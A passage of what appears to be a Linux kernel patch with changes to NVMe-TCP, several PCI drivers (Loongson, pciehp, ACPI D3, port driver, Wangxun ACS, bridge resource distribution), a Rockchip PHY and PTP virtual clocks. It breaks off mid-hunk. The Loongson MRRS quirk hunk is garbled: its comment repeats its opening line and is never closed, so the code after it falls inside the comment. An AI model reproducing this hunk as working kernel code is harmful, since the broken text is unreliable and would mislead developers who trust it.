+ 	len = nvmf_get_address(ctrl, buf, size);
+ 
++	mutex_lock(&queue->queue_lock);
++
++	if (!test_bit(NVME_TCP_Q_LIVE, &queue->flags))
++		goto done;
+ 	ret = kernel_getsockname(queue->sock, (struct sockaddr *)&src_addr);
+ 	if (ret > 0) {
+ 		if (len > 0)
+@@ -2493,6 +2497,8 @@ static int nvme_tcp_get_address(struct nvme_ctrl *ctrl, char *buf, int size)
+ 		len += scnprintf(buf + len, size - len, "%ssrc_addr=%pISc\n",
+ 				(len) ? "," : "", &src_addr);
+ 	}
++done:
++	mutex_unlock(&queue->queue_lock);
+ 
+ 	return len;
+ }
+diff --git a/drivers/pci/controller/pci-loongson.c b/drivers/pci/controller/pci-loongson.c
+index 05c50408f13b7..fe0f732f6e434 100644
+--- a/drivers/pci/controller/pci-loongson.c
++++ b/drivers/pci/controller/pci-loongson.c
+@@ -15,9 +15,14 @@
+ #include "../pci.h"
+ 
+ /* Device IDs */
+-#define DEV_PCIE_PORT_0	0x7a09
+-#define DEV_PCIE_PORT_1	0x7a19
+-#define DEV_PCIE_PORT_2	0x7a29
++#define DEV_LS2K_PCIE_PORT0	0x1a05
++#define DEV_LS7A_PCIE_PORT0	0x7a09
++#define DEV_LS7A_PCIE_PORT1	0x7a19
++#define DEV_LS7A_PCIE_PORT2	0x7a29
++#define DEV_LS7A_PCIE_PORT3	0x7a39
++#define DEV_LS7A_PCIE_PORT4	0x7a49
++#define DEV_LS7A_PCIE_PORT5	0x7a59
++#define DEV_LS7A_PCIE_PORT6	0x7a69
+ 
+ #define DEV_LS2K_APB	0x7a02
+ #define DEV_LS7A_GMAC	0x7a03
+@@ -53,11 +58,11 @@ static void bridge_class_quirk(struct pci_dev *dev)
+ 	dev->class = PCI_CLASS_BRIDGE_PCI_NORMAL;
+ }
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
+-			DEV_PCIE_PORT_0, bridge_class_quirk);
++			DEV_LS7A_PCIE_PORT0, bridge_class_quirk);
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
+-			DEV_PCIE_PORT_1, bridge_class_quirk);
++			DEV_LS7A_PCIE_PORT1, bridge_class_quirk);
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
+-			DEV_PCIE_PORT_2, bridge_class_quirk);
++			DEV_LS7A_PCIE_PORT2, bridge_class_quirk);
+ 
+ static void system_bus_quirk(struct pci_dev *pdev)
+ {
+@@ -75,37 +80,33 @@ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
+ 			DEV_LS7A_LPC, system_bus_quirk);
+ 
+-static void loongson_mrrs_quirk(struct pci_dev *dev)
++static void loongson_mrrs_quirk(struct pci_dev *pdev)
+ {
+-	struct pci_bus *bus = dev->bus;
+-	struct pci_dev *bridge;
+-	static const struct pci_device_id bridge_devids[] = {
+-		{ PCI_VDEVICE(LOONGSON, DEV_PCIE_PORT_0) },
+-		{ PCI_VDEVICE(LOONGSON, DEV_PCIE_PORT_1) },
+-		{ PCI_VDEVICE(LOONGSON, DEV_PCIE_PORT_2) },
+-		{ 0, },
+-	};
+-
+-	/* look for the matching bridge */
+-	while (!pci_is_root_bus(bus)) {
+-		bridge = bus->self;
+-		bus = bus->parent;
+-		/*
+-		 * Some Loongson PCIe ports have a h/w limitation of
+-		 * 256 bytes maximum read request size. They can't handle
+-		 * anything larger than this. So force this limit on
+-		 * any devices attached under these ports.
+-		 */
+-		if (pci_match_id(bridge_devids, bridge)) {
+-			if (pcie_get_readrq(dev) > 256) {
+-				pci_info(dev, "limiting MRRS to 256\n");
+-				pcie_set_readrq(dev, 256);
+-			}
+-			break;
+-		}
+-	}
++	/*
++	 * Some Loongson PCIe ports have h/w limitations of maximum read
++	 * Some Loongson PCIe ports have a h/w limitation on the maximum read
++	 * request size. They can't handle anything larger than this, so
++	 * force this limit on any device attached under these ports.
++	struct pci_host_bridge *bridge = pci_find_host_bridge(pdev->bus);
++
++	bridge->no_inc_mrrs = 1;
+ }
+-DECLARE_PCI_FIXUP_ENABLE(PCI_ANY_ID, PCI_ANY_ID, loongson_mrrs_quirk);
++DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
++			DEV_LS2K_PCIE_PORT0, loongson_mrrs_quirk);
++DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
++			DEV_LS7A_PCIE_PORT0, loongson_mrrs_quirk);
++DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
++			DEV_LS7A_PCIE_PORT1, loongson_mrrs_quirk);
++DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
++			DEV_LS7A_PCIE_PORT2, loongson_mrrs_quirk);
++DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
++			DEV_LS7A_PCIE_PORT3, loongson_mrrs_quirk);
++DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
++			DEV_LS7A_PCIE_PORT4, loongson_mrrs_quirk);
++DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
++			DEV_LS7A_PCIE_PORT5, loongson_mrrs_quirk);
++DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
++			DEV_LS7A_PCIE_PORT6, loongson_mrrs_quirk);
+ 
+ static void loongson_pci_pin_quirk(struct pci_dev *pdev)
+ {
+diff --git a/drivers/pci/hotplug/pciehp_hpc.c b/drivers/pci/hotplug/pciehp_hpc.c
+index 10e9670eea0b0..f8c70115b6917 100644
+--- a/drivers/pci/hotplug/pciehp_hpc.c
++++ b/drivers/pci/hotplug/pciehp_hpc.c
+@@ -1088,6 +1088,8 @@ static void quirk_cmd_compl(struct pci_dev *pdev)
+ }
+ DECLARE_PCI_FIXUP_CLASS_EARLY(PCI_VENDOR_ID_INTEL, PCI_ANY_ID,
+ 			      PCI_CLASS_BRIDGE_PCI, 8, quirk_cmd_compl);
++DECLARE_PCI_FIXUP_CLASS_EARLY(PCI_VENDOR_ID_QCOM, 0x010e,
++			      PCI_CLASS_BRIDGE_PCI, 8, quirk_cmd_compl);
+ DECLARE_PCI_FIXUP_CLASS_EARLY(PCI_VENDOR_ID_QCOM, 0x0110,
+ 			      PCI_CLASS_BRIDGE_PCI, 8, quirk_cmd_compl);
+ DECLARE_PCI_FIXUP_CLASS_EARLY(PCI_VENDOR_ID_QCOM, 0x0400,
+diff --git a/drivers/pci/pci-acpi.c b/drivers/pci/pci-acpi.c
+index 068d6745bf98c..052a611081ecd 100644
+--- a/drivers/pci/pci-acpi.c
++++ b/drivers/pci/pci-acpi.c
+@@ -976,24 +976,41 @@ bool acpi_pci_power_manageable(struct pci_dev *dev)
+ bool acpi_pci_bridge_d3(struct pci_dev *dev)
+ {
+ 	struct pci_dev *rpdev;
+-	struct acpi_device *adev;
+-	acpi_status status;
+-	unsigned long long state;
++	struct acpi_device *adev, *rpadev;
+ 	const union acpi_object *obj;
+ 
+ 	if (acpi_pci_disabled || !dev->is_hotplug_bridge)
+ 		return false;
+ 
+-	/* Assume D3 support if the bridge is power-manageable by ACPI. */
+-	if (acpi_pci_power_manageable(dev))
+-		return true;
++	adev = ACPI_COMPANION(&dev->dev);
++	if (adev) {
++		/*
++		 * If the bridge has _S0W, whether or not it can go into D3
++		 * depends on what is returned by that object.  In particular,
++		 * if the power state returned by _S0W is D2 or shallower,
++		 * entering D3 should not be allowed.
++		 */
++		if (acpi_dev_power_state_for_wake(adev) <= ACPI_STATE_D2)
++			return false;
++
++		/*
++		 * Otherwise, assume that the bridge can enter D3 so long as it
++		 * is power-manageable via ACPI.
++		 */
++		if (acpi_device_power_manageable(adev))
++			return true;
++	}
+ 
+ 	rpdev = pcie_find_root_port(dev);
+ 	if (!rpdev)
+ 		return false;
+ 
+-	adev = ACPI_COMPANION(&rpdev->dev);
+-	if (!adev)
++	if (rpdev == dev)
++		rpadev = adev;
++	else
++		rpadev = ACPI_COMPANION(&rpdev->dev);
++
++	if (!rpadev)
+ 		return false;
+ 
+ 	/*
+@@ -1001,15 +1018,15 @@ bool acpi_pci_bridge_d3(struct pci_dev *dev)
+ 	 * doesn't supply a wakeup GPE via _PRW, it cannot signal hotplug
+ 	 * events from low-power states including D3hot and D3cold.
+ 	 */
+-	if (!adev->wakeup.flags.valid)
++	if (!rpadev->wakeup.flags.valid)
+ 		return false;
+ 
+ 	/*
+-	 * If the Root Port cannot wake itself from D3hot or D3cold, we
+-	 * can't use D3.
++	 * In the bridge-below-a-Root-Port case, evaluate _S0W for the Root Port
++	 * to verify whether or not it can signal wakeup from D3.
+ 	 */
+-	status = acpi_evaluate_integer(adev->handle, "_S0W", NULL, &state);
+-	if (ACPI_SUCCESS(status) && state < ACPI_STATE_D3_HOT)
++	if (rpadev != adev &&
++	    acpi_dev_power_state_for_wake(rpadev) <= ACPI_STATE_D2)
+ 		return false;
+ 
+ 	/*
+@@ -1018,7 +1035,7 @@ bool acpi_pci_bridge_d3(struct pci_dev *dev)
+ 	 * bridges *below* that Root Port can also signal hotplug events
+ 	 * while in D3.
+ 	 */
+-	if (!acpi_dev_get_property(adev, "HotPlugSupportInD3",
++	if (!acpi_dev_get_property(rpadev, "HotPlugSupportInD3",
+ 				   ACPI_TYPE_INTEGER, &obj) &&
+ 	    obj->integer.value == 1)
+ 		return true;
+diff --git a/drivers/pci/pci.c b/drivers/pci/pci.c
+index da748247061d2..7a67611dc5f48 100644
+--- a/drivers/pci/pci.c
++++ b/drivers/pci/pci.c
+@@ -6017,6 +6017,7 @@ int pcie_set_readrq(struct pci_dev *dev, int rq)
+ {
+ 	u16 v;
+ 	int ret;
++	struct pci_host_bridge *bridge = pci_find_host_bridge(dev->bus);
+ 
+ 	if (rq < 128 || rq > 4096 || !is_power_of_2(rq))
+ 		return -EINVAL;
+@@ -6035,6 +6036,15 @@ int pcie_set_readrq(struct pci_dev *dev, int rq)
+ 
+ 	v = (ffs(rq) - 8) << 12;
+ 
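++	/* Some host bridges (e.g. Loongson, see loongson_mrrs_quirk()) cap
++	 * MRRS in hardware and cannot accept a larger value.
++	 */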
++	if (bridge->no_inc_mrrs) {
++		int max_mrrs = pcie_get_readrq(dev);
++
++		if (rq > max_mrrs) {
++			pci_info(dev, "can't set Max_Read_Request_Size to %d; max is %d\n", rq, max_mrrs);
++			return -EINVAL;
++		}
++	}
++
+ 	ret = pcie_capability_clear_and_set_word(dev, PCI_EXP_DEVCTL,
+ 						  PCI_EXP_DEVCTL_READRQ, v);
+ 
+diff --git a/drivers/pci/pcie/portdrv.c b/drivers/pci/pcie/portdrv.c
+index 2cc2e60bcb396..46fad0d813b2b 100644
+--- a/drivers/pci/pcie/portdrv.c
++++ b/drivers/pci/pcie/portdrv.c
+@@ -501,7 +501,6 @@ static void pcie_port_device_remove(struct pci_dev *dev)
+ {
+ 	device_for_each_child(&dev->dev, NULL, remove_iter);
+ 	pci_free_irq_vectors(dev);
+-	pci_disable_device(dev);
+ }
+ 
+ /**
+@@ -727,6 +726,19 @@ static void pcie_portdrv_remove(struct pci_dev *dev)
+ 	}
+ 
+ 	pcie_port_device_remove(dev);
++
++	pci_disable_device(dev);
++}
++
++static void pcie_portdrv_shutdown(struct pci_dev *dev)
++{
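++	/* For ports that may enter D3, block runtime PM so the device is
++	 * not suspended while it is being shut down.
++	 */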
++	if (pci_bridge_d3_possible(dev)) {
++		pm_runtime_forbid(&dev->dev);
++		pm_runtime_get_noresume(&dev->dev);
++		pm_runtime_dont_use_autosuspend(&dev->dev);
++	}
++
++	pcie_port_device_remove(dev);
+ }
+ 
+ static pci_ers_result_t pcie_portdrv_error_detected(struct pci_dev *dev,
+@@ -777,7 +789,7 @@ static struct pci_driver pcie_portdriver = {
+ 
+ 	.probe		= pcie_portdrv_probe,
+ 	.remove		= pcie_portdrv_remove,
+-	.shutdown	= pcie_portdrv_remove,
++	.shutdown	= pcie_portdrv_shutdown,
+ 
+ 	.err_handler	= &pcie_portdrv_err_handler,
+ 
+diff --git a/drivers/pci/quirks.c b/drivers/pci/quirks.c
+index 20ac67d590348..494fa46f57671 100644
+--- a/drivers/pci/quirks.c
++++ b/drivers/pci/quirks.c
+@@ -4835,6 +4835,26 @@ static int pci_quirk_brcm_acs(struct pci_dev *dev, u16 acs_flags)
+ 		PCI_ACS_SV | PCI_ACS_RR | PCI_ACS_CR | PCI_ACS_UF);
+ }
+ 
++/*
++ * Wangxun 10G/1G NICs have no ACS capability, and on multi-function
++ * devices, peer-to-peer transactions are not used between the functions.
++ * So add an ACS quirk for the devices below to isolate the functions.
++ * SFxxx 1G NICs(em).
++ * RP1000/RP2000 10G NICs(sp).
++ */
++static int pci_quirk_wangxun_nic_acs(struct pci_dev *dev, u16 acs_flags)
++{
++	switch (dev->device) {
++	case 0x0100 ... 0x010F:
++	case 0x1001:
++	case 0x2001:
++		return pci_acs_ctrl_enabled(acs_flags,
++			PCI_ACS_SV | PCI_ACS_RR | PCI_ACS_CR | PCI_ACS_UF);
++	}
++
++	return false;
++}
++
+ static const struct pci_dev_acs_enabled {
+ 	u16 vendor;
+ 	u16 device;
+@@ -4980,6 +5000,8 @@ static const struct pci_dev_acs_enabled {
+ 	{ PCI_VENDOR_ID_NXP, 0x8d9b, pci_quirk_nxp_rp_acs },
+ 	/* Zhaoxin Root/Downstream Ports */
+ 	{ PCI_VENDOR_ID_ZHAOXIN, PCI_ANY_ID, pci_quirk_zhaoxin_pcie_ports_acs },
++	/* Wangxun nics */
++	{ PCI_VENDOR_ID_WANGXUN, PCI_ANY_ID, pci_quirk_wangxun_nic_acs },
+ 	{ 0 }
+ };
+ 
+diff --git a/drivers/pci/setup-bus.c b/drivers/pci/setup-bus.c
+index b4096598dbcbb..c690572b10ce7 100644
+--- a/drivers/pci/setup-bus.c
++++ b/drivers/pci/setup-bus.c
+@@ -1765,12 +1765,70 @@ static void adjust_bridge_window(struct pci_dev *bridge, struct resource *res,
+ 		add_size = size - new_size;
+ 		pci_dbg(bridge, "bridge window %pR shrunken by %pa\n", res,
+ 			&add_size);
++	} else {
++		return;
+ 	}
+ 
+ 	res->end = res->start + new_size - 1;
+-	remove_from_list(add_list, res);
++
++	/* If the resource is part of the add_list, remove it now */
++	if (add_list)
++		remove_from_list(add_list, res);
++}
++
++static void remove_dev_resource(struct resource *avail, struct pci_dev *dev,
++				struct resource *res)
++{
++	resource_size_t size, align, tmp;
++
++	size = resource_size(res);
++	if (!size)
++		return;
++
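++	/* Charge this BAR against the available window: alignment padding
++	 * plus the BAR size, clamped to one past the end of the window.
++	 */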
++	align = pci_resource_alignment(dev, res);
++	align = align ? ALIGN(avail->start, align) - avail->start : 0;
++	tmp = align + size;
++	avail->start = min(avail->start + tmp, avail->end + 1);
++}
++
++static void remove_dev_resources(struct pci_dev *dev, struct resource *io,
++				 struct resource *mmio,
++				 struct resource *mmio_pref)
++{
++	int i;
++
++	for (i = 0; i < PCI_NUM_RESOURCES; i++) {
++		struct resource *res = &dev->resource[i];
++
++		if (resource_type(res) == IORESOURCE_IO) {
++			remove_dev_resource(io, dev, res);
++		} else if (resource_type(res) == IORESOURCE_MEM) {
++
++			/*
++			 * Make sure prefetchable memory is reduced from
++			 * the correct resource. Specifically, we put 32-bit
++			 * prefetchable memory in the non-prefetchable window
++			 * if there is a 64-bit prefetchable window.
++			 *
++			 * See comments in __pci_bus_size_bridges() for
++			 * more information.
++			 */
++			if ((res->flags & IORESOURCE_PREFETCH) &&
++			    ((res->flags & IORESOURCE_MEM_64) ==
++			     (mmio_pref->flags & IORESOURCE_MEM_64)))
++				remove_dev_resource(mmio_pref, dev, res);
++			else
++				remove_dev_resource(mmio, dev, res);
++		}
++	}
+ }
+ 
++/*
++ * io, mmio and mmio_pref contain the total amount of bridge window space
++ * available. This includes the minimal space needed to cover all the
++ * existing devices on the bus and the possible extra space that can be
++ * shared with the bridges.
++ */
+ static void pci_bus_distribute_available_resources(struct pci_bus *bus,
+ 					    struct list_head *add_list,
+ 					    struct resource io,
+@@ -1780,7 +1838,7 @@ static void pci_bus_distribute_available_resources(struct pci_bus *bus,
+ 	unsigned int normal_bridges = 0, hotplug_bridges = 0;
+ 	struct resource *io_res, *mmio_res, *mmio_pref_res;
+ 	struct pci_dev *dev, *bridge = bus->self;
+-	resource_size_t io_per_hp, mmio_per_hp, mmio_pref_per_hp, align;
++	resource_size_t io_per_b, mmio_per_b, mmio_pref_per_b, align;
+ 
+ 	io_res = &bridge->resource[PCI_BRIDGE_IO_WINDOW];
+ 	mmio_res = &bridge->resource[PCI_BRIDGE_MEM_WINDOW];
+@@ -1824,94 +1882,88 @@ static void pci_bus_distribute_available_resources(struct pci_bus *bus,
+ 			normal_bridges++;
+ 	}
+ 
++	if (!(hotplug_bridges + normal_bridges))
++		return;
++
+ 	/*
+-	 * There is only one bridge on the bus so it gets all available
+-	 * resources which it can then distribute to the possible hotplug
+-	 * bridges below.
++	 * Calculate the amount of space we can forward from "bus" to any
++	 * downstream buses, i.e., the space left over after assigning the
++	 * BARs and windows on "bus".
+ 	 */
+-	if (hotplug_bridges + normal_bridges == 1) {
+-		dev = list_first_entry(&bus->devices, struct pci_dev, bus_list);
+-		if (dev->subordinate)
+-			pci_bus_distribute_available_resources(dev->subordinate,
+-				add_list, io, mmio, mmio_pref);
+-		return;
++	list_for_each_entry(dev, &bus->devices, bus_list) {
++		if (!dev->is_virtfn)
++			remove_dev_resources(dev, &io, &mmio, &mmio_pref);
+ 	}
+ 
+-	if (hotplug_bridges == 0)
+-		return;
+-
+ 	/*
+-	 * Calculate the total amount of extra resource space we can
+-	 * pass to bridges below this one.  This is basically the
+-	 * extra space reduced by the minimal required space for the
+-	 * non-hotplug bridges.
++	 * If there is at least one hotplug bridge on this bus it gets all
++	 * the extra resource space that was left after the reductions
++	 * above.
++	 *
++	 * If there are no hotplug bridges the extra resource space is
++	 * split between non-hotplug bridges. This is to allow possible
++	 * hotplug bridges below them to get the extra space as well.
+ 	 */
++	if (hotplug_bridges) {
++		io_per_b = div64_ul(resource_size(&io), hotplug_bridges);
++		mmio_per_b = div64_ul(resource_size(&mmio), hotplug_bridges);
++		mmio_pref_per_b = div64_ul(resource_size(&mmio_pref),
++					   hotplug_bridges);
++	} else {
++		io_per_b = div64_ul(resource_size(&io), normal_bridges);
++		mmio_per_b = div64_ul(resource_size(&mmio), normal_bridges);
++		mmio_pref_per_b = div64_ul(resource_size(&mmio_pref),
++					   normal_bridges);
++	}
++
+ 	for_each_pci_bridge(dev, bus) {
+-		resource_size_t used_size;
+ 		struct resource *res;
++		struct pci_bus *b;
+ 
+-		if (dev->is_hotplug_bridge)
++		b = dev->subordinate;
++		if (!b)
++			continue;
++		if (hotplug_bridges && !dev->is_hotplug_bridge)
+ 			continue;
+ 
++		res = &dev->resource[PCI_BRIDGE_IO_WINDOW];
++
+ 		/*
+-		 * Reduce the available resource space by what the
+-		 * bridge and devices below it occupy.
++		 * Make sure the split resource space is properly aligned
++		 * for bridge windows (align it down to avoid going above
++		 * what is available).
+ 		 */
+-		res = &dev->resource[PCI_BRIDGE_IO_WINDOW];
+ 		align = pci_resource_alignment(dev, res);
+-		align = align ? ALIGN(io.start, align) - io.start : 0;
+-		used_size = align + resource_size(res);
+-		if (!res->parent)
+-			io.start = min(io.start + used_size, io.end + 1);
++		io.end = align ? io.start + ALIGN_DOWN(io_per_b, align) - 1
++			       : io.start + io_per_b - 1;
++
++		/*
++		 * The x_per_b values hold the extra resource space that can
++		 * be added for each bridge, but the minimal space is already
++		 * reserved as well, so adjust x.start down accordingly to
++		 * cover the whole space.
++		 */
++		io.start -= resource_size(res);
+ 
+ 		res = &dev->resource[PCI_BRIDGE_MEM_WINDOW];
+ 		align = pci_resource_alignment(dev, res);
+-		align = align ? ALIGN(mmio.start, align) - mmio.start : 0;
+-		used_size = align + resource_size(res);
+-		if (!res->parent)
+-			mmio.start = min(mmio.start + used_size, mmio.end + 1);
++		mmio.end = align ? mmio.start + ALIGN_DOWN(mmio_per_b, align) - 1
++				 : mmio.start + mmio_per_b - 1;
++		mmio.start -= resource_size(res);
+ 
+ 		res = &dev->resource[PCI_BRIDGE_PREF_MEM_WINDOW];
+ 		align = pci_resource_alignment(dev, res);
+-		align = align ? ALIGN(mmio_pref.start, align) -
+-			mmio_pref.start : 0;
+-		used_size = align + resource_size(res);
+-		if (!res->parent)
+-			mmio_pref.start = min(mmio_pref.start + used_size,
+-				mmio_pref.end + 1);
+-	}
+-
+-	io_per_hp = div64_ul(resource_size(&io), hotplug_bridges);
+-	mmio_per_hp = div64_ul(resource_size(&mmio), hotplug_bridges);
+-	mmio_pref_per_hp = div64_ul(resource_size(&mmio_pref),
+-		hotplug_bridges);
+-
+-	/*
+-	 * Go over devices on this bus and distribute the remaining
+-	 * resource space between hotplug bridges.
+-	 */
+-	for_each_pci_bridge(dev, bus) {
+-		struct pci_bus *b;
+-
+-		b = dev->subordinate;
+-		if (!b || !dev->is_hotplug_bridge)
+-			continue;
+-
+-		/*
+-		 * Distribute available extra resources equally between
+-		 * hotplug-capable downstream ports taking alignment into
+-		 * account.
+-		 */
+-		io.end = io.start + io_per_hp - 1;
+-		mmio.end = mmio.start + mmio_per_hp - 1;
+-		mmio_pref.end = mmio_pref.start + mmio_pref_per_hp - 1;
++		mmio_pref.end = align ? mmio_pref.start +
++					ALIGN_DOWN(mmio_pref_per_b, align) - 1
++				      : mmio_pref.start + mmio_pref_per_b - 1;
++		mmio_pref.start -= resource_size(res);
+ 
+ 		pci_bus_distribute_available_resources(b, add_list, io, mmio,
+ 						       mmio_pref);
+ 
+-		io.start += io_per_hp;
+-		mmio.start += mmio_per_hp;
+-		mmio_pref.start += mmio_pref_per_hp;
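++		/* Start the next window right after the one just handed out */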
++		io.start = io.end + 1;
++		mmio.start = mmio.end + 1;
++		mmio_pref.start = mmio_pref.end + 1;
+ 	}
+ }
+ 
+@@ -1923,6 +1975,8 @@ static void pci_bridge_distribute_available_resources(struct pci_dev *bridge,
+ 	if (!bridge->is_hotplug_bridge)
+ 		return;
+ 
++	pci_dbg(bridge, "distributing available resources\n");
++
+ 	/* Take the initial extra resources from the hotplug port */
+ 	available_io = bridge->resource[PCI_BRIDGE_IO_WINDOW];
+ 	available_mmio = bridge->resource[PCI_BRIDGE_MEM_WINDOW];
+@@ -1934,6 +1988,54 @@ static void pci_bridge_distribute_available_resources(struct pci_dev *bridge,
+ 					       available_mmio_pref);
+ }
+ 
++static bool pci_bridge_resources_not_assigned(struct pci_dev *dev)
++{
++	const struct resource *r;
++
++	/*
++	 * If the child device's resources are not yet assigned it means we
++	 * are configuring them (not the boot firmware), so we should be
++	 * able to extend the upstream bridge resources in the same way we
++	 * do with the normal hotplug case.
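++	 * IORESOURCE_STARTALIGN on a window means its start field still
++	 * holds an alignment requirement, i.e. the window is not assigned yet.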
++	 */
++	r = &dev->resource[PCI_BRIDGE_IO_WINDOW];
++	if (r->flags && !(r->flags & IORESOURCE_STARTALIGN))
++		return false;
++	r = &dev->resource[PCI_BRIDGE_MEM_WINDOW];
++	if (r->flags && !(r->flags & IORESOURCE_STARTALIGN))
++		return false;
++	r = &dev->resource[PCI_BRIDGE_PREF_MEM_WINDOW];
++	if (r->flags && !(r->flags & IORESOURCE_STARTALIGN))
++		return false;
++
++	return true;
++}
++
++static void
++pci_root_bus_distribute_available_resources(struct pci_bus *bus,
++					    struct list_head *add_list)
++{
++	struct pci_dev *dev, *bridge = bus->self;
++
++	for_each_pci_bridge(dev, bus) {
++		struct pci_bus *b;
++
++		b = dev->subordinate;
++		if (!b)
++			continue;
++
++		/*
++		 * Need to check "bridge" here too because it is NULL
++		 * in the case of the root bus.
++		 */
++		if (bridge && pci_bridge_resources_not_assigned(dev))
++			pci_bridge_distribute_available_resources(bridge,
++								  add_list);
++		else
++			pci_root_bus_distribute_available_resources(b, add_list);
++	}
++}
++
+ /*
+  * First try will not touch PCI bridge res.
+  * Second and later try will clear small leaf bridge res.
+@@ -1973,6 +2075,8 @@ again:
+ 	 */
+ 	__pci_bus_size_bridges(bus, add_list);
+ 
++	pci_root_bus_distribute_available_resources(bus, add_list);
++
+ 	/* Depth last, allocate resources and update the hardware. */
+ 	__pci_bus_assign_resources(bus, add_list, &fail_head);
+ 	if (add_list)
+diff --git a/drivers/phy/rockchip/phy-rockchip-typec.c b/drivers/phy/rockchip/phy-rockchip-typec.c
+index 6aea512e5d4ee..39db8acde61af 100644
+--- a/drivers/phy/rockchip/phy-rockchip-typec.c
++++ b/drivers/phy/rockchip/phy-rockchip-typec.c
+@@ -808,9 +808,8 @@ static int tcphy_get_mode(struct rockchip_typec_phy *tcphy)
+ 	struct extcon_dev *edev = tcphy->extcon;
+ 	union extcon_property_value property;
+ 	unsigned int id;
+-	bool ufp, dp;
+ 	u8 mode;
+-	int ret;
++	int ret, ufp, dp;
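++	/* ufp/dp hold extcon_get_state() results (can be -errno), hence int */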
+ 
+ 	if (!edev)
+ 		return MODE_DFP_USB;
+diff --git a/drivers/ptp/ptp_private.h b/drivers/ptp/ptp_private.h
+index 77918a2c67018..75f58fc468a71 100644
+--- a/drivers/ptp/ptp_private.h
++++ b/drivers/ptp/ptp_private.h
+@@ -66,7 +66,7 @@ struct ptp_vclock {
+ 	struct hlist_node vclock_hash_node;
+ 	struct cyclecounter cc;
+ 	struct timecounter tc;
+-	spinlock_t lock;	/* protects tc/cc */
++	struct mutex lock;	/* protects tc/cc */
+ };
+ 
+ /*
+diff --git a/drivers/ptp/ptp_vclock.c b/drivers/ptp/ptp_vclock.c
+index 1c0ed4805c0aa..dcf752c9e0450 100644
+--- a/drivers/ptp/ptp_vclock.c
++++ b/drivers/ptp/ptp_vclock.c
+@@ -43,16 +43,16 @@ static void ptp_vclock_hash_del(struct ptp_vclock *vclock)
+ static int ptp_vclock_adjfine(struct ptp_clock_info *ptp, long scaled_ppm)
+ {
+ 	struct ptp_vclock *vclock = info_to_vclock(ptp);
+-	unsigned long flags;
+ 	s64 adj;
+ 
+ 	adj = (s64)scaled_ppm << PTP_VCLOCK_FADJ_SHIFT;
+ 	adj = div_s64(adj, PTP_VCLOCK_FADJ_DENOMINATOR);
+ 
+-	spin_lock_irqsave(&vclock->lock, flags);
++	if (mutex_lock_interruptible(&vclock->lock))
++		return -EINTR;
+ 	timecounter_read(&vclock->tc);
+ 	vclock->cc.mult = PTP_VCLOCK_CC_MULT + adj;
+-	spin_unlock_irqrestore(&vclock->lock, flags);
++	mutex_unlock(&vclock->lock);
+ 
+ 	return 0;
+ }
+@@ -60,11 +60,11 @@ static int ptp_vclock_adjfine(struct ptp_clock_info *ptp, long scaled_ppm)
+ static int ptp_vclock_adjtime(struct ptp_clock_info *ptp, s64 delta)
+ {
+ 	struct ptp_vclock *vclock = info_to_vclock(ptp);
+-	unsigned long flags;
+ 
+-	spin_lock_irqsave(&vclock->lock, flags);
++	if (mutex_lock_interruptible(&vclock->lock))
++		return -EINTR;
+ 	timecounter_adjtime(&vclock->tc, delta);
+-	spin_unlock_irqrestore(&vclock->lock, flags);
++	mutex_unlock(&vclock->lock);
+ 
+ 	return 0;
+ }
+@@ -73,12 +73,12 @@ static int ptp_vclock_gettime(struct ptp_clock_info *ptp,
+ 			      struct timespec64 *ts)
+ {
+ 	struct ptp_vclock *vclock = info_to_vclock(ptp);
+-	unsigned long flags;
+ 	u64 ns;
+ 
+-	spin_lock_irqsave(&vclock->lock, flags);
++	if (mutex_lock_interruptible(&vclock->lock))
++		return -EINTR;
+ 	ns = timecounter_read(&vclock->tc);
+-	spin_unlock_irqrestore(&vclock->lock, flags);
++	mutex_unlock(&vclock->lock);
+ 	*ts = ns_to_timespec64(ns);
+ 
+ 	return 0;
+@@ -91,7 +91,6 @@ static int ptp_vclock_gettimex(struct ptp_clock_info *ptp,
+ 	struct ptp_vclock *vclock = info_to_vclock(ptp);
+ 	struct ptp_clock *pptp = vclock->pclock;
+ 	struct timespec64 pts;
+-	unsigned long flags;
+ 	int err;
+ 	u64 ns;
+ 
+@@ -99,9 +98,10 @@ static int ptp_vclock_gettimex(struct ptp_clock_info *ptp,
+ 	if (err)
+ 		return err;
+ 
+-	spin_lock_irqsave(&vclock->lock, flags);
++	if (mutex_lock_interruptible(&vclock->lock))
++		return -EINTR;
+ 	ns = timecounter_cyc2time(&vclock->tc, timespec64_to_ns(&pts));
+-	spin_unlock_irqrestore(&vclock->lock, flags);
++	mutex_unlock(&vclock->lock);
+ 
+ 	*ts = ns_to_timespec64(ns);
+ 
+@@ -113,11 +113,11 @@ static int ptp_vclock_settime(struct ptp_clock_info *ptp,
+ {
+ 	struct ptp_vclock *vclock = info_to_vclock(ptp);
+ 	u64 ns = timespec64_to_ns(ts);
+-	unsigned long flags;
+ 
+-	spin_lock_irqsave(&vclock->lock, flags);
++	if (mutex_lock_interruptible(&vclock->lock))
++		return -EINTR;
+ 	timecounter_init(&vclock->tc, &vclock->cc, ns);
+-	spin_unlock_irqrestore(&vclock->lock, flags);
++	mutex_unlock(&vclock->lock);
+ 
+ 	return 0;
+ }
+@@ -127,7 +127,6 @@ static int ptp_vclock_getcrosststamp(struct ptp_clock_info *ptp,
+ {
+ 	struct ptp_vclock *vclock = info_to_vclock(ptp);
+ 	struct ptp_clock *pptp = vclock->pclock;
+-	unsigned long flags;
+ 	int err;
+ 	u64 ns;
+ 
+@@ -135,9 +134,10 @@ static int ptp_vclock_getcrosststamp(struct ptp_clock_info *ptp,
+ 	if (err)
+ 		return err;
+ 
+-	spin_lock_irqsave(&vclock->lock, flags);
